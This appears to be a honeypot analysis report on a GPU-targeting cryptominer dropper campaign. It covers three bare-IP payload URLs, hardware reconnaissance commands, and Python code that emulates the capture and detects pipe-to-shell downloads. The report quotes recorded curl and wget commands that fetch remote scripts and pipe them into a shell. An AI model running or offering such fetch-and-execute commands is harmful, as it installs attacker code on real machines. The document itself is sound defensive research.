3 payload URLs · 6 download attempts · 259 execution attempts · 0 bytes executed

The three payload URLs

During the analysis period, the honeypot recorded download attempts to exactly three external destinations, all three addressed by bare IP over plain HTTP. Their behavior differs:

URL #1 — Direct IP, no DNS

http://151.242.[REDACTED].40/loader.sh

1 download_attempt + 1 download recorded. The URL points straight at an IP, with no domain name. Skipping DNS leaves no resolver logs to query and nothing for malicious-domain blocklists to match; the request has to be caught at the HTTP or process level instead. The name loader.sh is typical of a first-stage dropper: a shell script whose job is to install the real payload.

Content received: 684 bytes captured in the isolated environment. The payload was stored but execution was blocked: 0 bytes executed on the real host.

URL #2 — The same payload from a second host

http://197.255.[REDACTED].88:1987/favico.ico

1 download_attempt + 1 download recorded. It is served on a high port (1987) under the decoy name favico.ico, which mimics a favicon so the request passes as harmless web traffic; the content is a script. Plain HTTP, no TLS: the payload travels unencrypted.

The telling detail: exactly 684 bytes, the same size as loader.sh. That is a strong indication that the same payload is being served from two distinct IPs, hosting redundancy so that if one goes down or is blocked the other keeps serving. A size match alone is not proof, though; comparing the hashes of the two captured files is what settles it.

URL #3 — The destination that failed

http://31.172.[REDACTED].45/mot

2 download_attempt, 0 download: two attempts, 0 bytes received. Either the server was already down or the request was blocked before it got there. A reminder that the attacker's ephemeral infrastructure fails too, and that every attempt, successful or not, is logged.

The download chain: how it got here

The download attempts did not occur in isolation. They followed the documented GPU hunter pattern: the attacker first runs reconnaissance (lspci, nvidia-smi), and only in sessions where the full sequence completed without errors does the script move on to the payload download phase.

# Phase 1: GPU hunter (hardware reconnaissance)
$ lspci | grep VGA | cut -f5- -d ' '
$ nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8}'
$ /bin/./uname -s -v -n -r -m
# Phase 2: dropper download (conditional on a detected GPU)
$ curl -s http://151.242.[REDACTED].40/loader.sh | bash
# or, the wget equivalent:
$ wget -qO- http://197.255.[REDACTED].88:1987/favico.ico | sh

The curl ... | bash pattern is deliberate: the script is fetched and fed straight into the interpreter in one command, never written to disk, so no loader.sh is left on the filesystem as a forensic artifact. What it does not hide is the command line itself (process auditing and execve tracing still record it, as does the outbound HTTP connection), and whatever second stage loader.sh installs still has to land on disk or in memory.

The 259 execution attempts

The honeypot recorded 259 events of type execution_attempt and 547 file_write events in the window — the downloaded payload is stored in the isolated environment before any attempt to execute it. No execution succeeded.

Event                                                  | Count | Result
file_write (payload stored in isolated environment)    | 547   | Success: file recorded
execution_attempt (attempt to run the payload)         | 259   | Execution blocked, no code executed
Bytes executed on the real host                        | 0     | The honeypot never executes external code
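As an added example (not the page's or CipherSentry's code), the event chain in the table emulated in Python: every fetch is logged as a download_attempt, whatever comes back is stored and hashed in an isolated store (download, file_write), a pipe into a shell is logged as an execution_attempt, and no payload is ever run. The fetcher is injected, the command lines and payload bodies are constructed, and the addresses are TEST-NET placeholders rather than the redacted ones above. It also carries the point made about URL #2: two bodies of identical size are compared by hash, which is the check that decides whether they are the same payload.

```python
"""Emulation of the capture chain behind the event counts: download_attempt,
download, file_write, execution_attempt, and 0 bytes executed. Added example,
not CipherSentry's code; the fetcher is injected so it runs offline on
constructed responses."""
import hashlib
import re
from collections import Counter
from typing import Callable, Dict, List, Optional

URL_RE = re.compile(r"https?://[^\s|;&]+")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:ba)?sh\b")

# Constructed payload bodies. BODY_A stands in for loader.sh; BODY_B is a
# different script of exactly the same length, to show why a size match alone
# is not proof that two downloads are the same payload.
BODY_A = b"#!/bin/sh\n# constructed stand-in\nwget -qO- http://example.invalid/x | sh\n"
BODY_B = b"#!/bin/sh\n# constructed stand-in\nwget -qO- http://example.invalid/y | sh\n"

# Constructed responses (TEST-NET addresses, not the redacted real ones):
# the same bytes from two hosts, and one destination that never answers.
FAKE_RESPONSES: Dict[str, Optional[bytes]] = {
    "http://203.0.113.40/loader.sh": BODY_A,
    "http://198.51.100.88:1987/favico.ico": BODY_A,
    "http://192.0.2.45/mot": None,
}

# Constructed command lines in the shape of the recorded session.
SAMPLE_COMMANDS: List[str] = [
    "curl -s http://203.0.113.40/loader.sh | bash",
    "wget -qO- http://198.51.100.88:1987/favico.ico | sh",
    "curl -s http://192.0.2.45/mot | bash",
    "curl -s http://192.0.2.45/mot | bash",
]


class Honeypot:
    """Counts the same event types the article reports; never runs a payload."""

    def __init__(self, fetch: Callable[[str], Optional[bytes]]):
        self.fetch = fetch
        self.events: Counter = Counter()
        self.store: Dict[str, bytes] = {}   # sha256 -> bytes: the isolated environment
        self.bytes_executed = 0             # stays 0 by construction

    def handle(self, cmdline: str) -> Optional[str]:
        """Process one recorded command; return the sha256 of what was stored, if anything."""
        m = URL_RE.search(cmdline)
        if m is None:
            return None
        self.events["download_attempt"] += 1
        body = self.fetch(m.group(0))
        if body is None:
            return None                     # destination failed: the attempt is still logged
        self.events["download"] += 1
        digest = hashlib.sha256(body).hexdigest()
        self.store[digest] = body
        self.events["file_write"] += 1
        if PIPE_TO_SHELL_RE.search(cmdline):
            self.events["execution_attempt"] += 1
            # No interpreter is invoked: the script is kept for analysis only.
        return digest


def same_payload(a: bytes, b: bytes) -> tuple:
    """(same size?, same content?) - only the second answers the question."""
    return (len(a) == len(b), hashlib.sha256(a).digest() == hashlib.sha256(b).digest())


def run_sample():
    hp = Honeypot(lambda url: FAKE_RESPONSES.get(url))
    digests = [hp.handle(c) for c in SAMPLE_COMMANDS]
    return hp, digests


if __name__ == "__main__":
    hp, digests = run_sample()
    print(dict(hp.events), "bytes_executed =", hp.bytes_executed)
    print("loader.sh and favico.ico identical:", digests[0] == digests[1])
    print("size match / hash match for two different scripts:", same_payload(BODY_A, BODY_B))
```

For a real capture the only changes are a fetcher with a hard timeout and a size cap, and keeping the store keyed on the hash so repeated downloads of one payload collapse to a single file.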

What the dropper's infrastructure reveals

All three URLs point to bare IPs, with no domain and no TLS. That combination is characteristic of ephemeral infrastructure: there is no domain to register, sinkhole or blocklist, and a burned IP is simply replaced by the next one. The inferences below follow from it.

Relationship with the GPU hunter campaign

The sessions with download attempts are a subset of the GPU hunter sessions. The dropper only activates when the hardware reconnaissance returns a positive result, which is consistent with a campaign optimizing the ratio of useful infections to total attempts.

In economic terms: downloading the payload has a cost (traffic, exposure of the dropper URL). The prior reconnaissance ensures that this cost is only incurred on machines with a GPU — the only ones that justify installing XMRig.

Detection and containment

The detection signals for this phase are more specific than those for the GPU hunter:
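The signals themselves, as detection logic over recorded command lines. This is an added example, not CipherSentry's detector; the sample lines are constructed in the shape of the commands above (with TEST-NET addresses in place of the redacted ones) plus two benign controls, and the verdict rule is an assumption: a network fetch piped into a shell, combined with at least one infrastructure signal (bare-IP host, non-standard port, or a static-asset name fed to an interpreter).

```python
"""Signals that separate the dropper phase from ordinary downloads in recorded
commands: bare-IP URL (no DNS), plain HTTP, a port other than 80/443, output
piped straight into a shell, and a static-asset name like favico.ico handed to
an interpreter. Added example; not CipherSentry's code."""
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s|;&]+")
# "| bash", "| sh", "|bash", "| /bin/sh", "| dash"
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:/bin/)?(?:ba|da)?sh\b")
STATIC_EXT = (".ico", ".png", ".jpg", ".gif", ".css", ".woff")


def analyze(cmdline: str) -> dict:
    """Return the signals one recorded command line fires and a verdict (assumed rule)."""
    signals = []
    m = URL_RE.search(cmdline)
    if m is None:
        return {"url": None, "signals": signals, "dropper": False}
    url = m.group(0)
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        ip_address(host)
        signals.append("direct_ip_url")        # no DNS resolution, nothing for domain blocklists
    except ValueError:
        pass
    if parts.scheme == "http":
        signals.append("plain_http")            # payload travels unencrypted, inspectable in transit
    if parts.port not in (None, 80, 443):
        signals.append("nonstandard_port")
    piped = PIPE_TO_SHELL_RE.search(cmdline) is not None
    if piped:
        signals.append("pipe_to_shell")         # fetch-and-execute in one command, nothing on disk
        if parts.path.lower().endswith(STATIC_EXT):
            signals.append("static_asset_to_shell")   # a "favicon" has no business in sh
    # Assumed verdict rule: execution from the network plus an infrastructure signal.
    dropper = piped and any(
        s in signals for s in ("direct_ip_url", "nonstandard_port", "static_asset_to_shell")
    )
    return {"url": url, "signals": signals, "dropper": dropper}


def scan(lines) -> list:
    """Analyze every line; returns (line, verdict) pairs."""
    return [(line, analyze(line)) for line in lines]


# Constructed sample in the shape of the recorded commands (TEST-NET addresses,
# not the redacted ones from the article); the last two are benign controls.
SAMPLE = [
    "curl -s http://203.0.113.40/loader.sh | bash",
    "wget -qO- http://198.51.100.88:1987/favico.ico | sh",
    "curl -s http://192.0.2.45/mot | bash",
    "/bin/./uname -s -v -n -r -m",
    "curl -fsSL https://deb.debian.org/debian/dists/bookworm/Release -o Release",
    "wget -q http://203.0.113.40/favicon.ico",
]

if __name__ == "__main__":
    for line, verdict in scan(SAMPLE):
        flag = "DROPPER" if verdict["dropper"] else "   -   "
        print(f"{flag} {', '.join(verdict['signals']) or 'no signals':<55} {line}")
```

The controls show why the combination matters: a bare-IP download with no pipe into a shell fires the infrastructure signals but is not flagged, and a domain-based HTTPS fetch fires nothing at all.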

Data collected for cybersecurity research purposes. All information comes from unsolicited activity recorded on our own infrastructure.

Data source
CipherSentry SSH honeypot · 2026-06-26 to 2026-06-28